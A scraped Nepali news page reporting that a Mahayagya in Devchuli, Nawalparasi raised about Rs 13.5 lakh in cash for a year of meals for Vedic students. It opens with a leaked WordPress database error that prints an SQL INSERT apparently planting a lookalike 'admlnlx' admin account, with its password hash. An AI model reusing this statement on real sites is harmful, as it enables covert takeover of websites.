WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bo1qpMKmDq0PwbH75f0NkG5V3EWEQP1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 09:23:31', '', 'admlnlx', 'admlnlx')
काठमाडौँ,माघ २५ –
नवलपरासी, देवचुली–१५ प्रगतिनगरस्थित पशुपति वैदिक आश्रम ट्रस्टबाट सञ्चालित धनधान्याचल महायज्ञमा रु साढे १३ लाख नगद र करिब रु छ लाख बराबरको जिन्सी सङ्कलन भएको छ ।
यही माघ १४ गतेदेखि सुरु भएको महायज्ञ यही माघ २३ गतेसम्म चलेको थियो । सो ट्रस्टले सञ्चालन गरेको पशुपति साङ्गवेद आवासीय संस्कृति माविमा पढ्ने करिब सय वटुकका लागि एक वर्षभरि भोजन भण्डारा चलाउन सो महायज्ञ गरिएको ट्रस्टका उत्तराधिकारी धर्मराज बरालले जानकारी दिनुभयो । त्यहाँ वटुकका लागि आवासको ठूलो समस्या रहेको बताइएको छ । यस क्षेत्रका भक्तजनको पितृउद्धार गर्ने उद्देश्यले सो भण्डारा चलाइने छ ।
महायज्ञकै अवसरमा विश्व हिन्दू महासङ्घ अन्तर्राष्ट्रिय समितिका वरिष्ठ उपाध्यक्ष अर्जुनप्रसाद बाँस्तोला‘संहिताशास्त्री’ले आफ्नो करिब रु आठ लाखको लागतमा सो माविमा संहिताशास्त्री कक्ष निर्माणका लागि शिलान्यास पनि गर्नुभएको छ । – रासस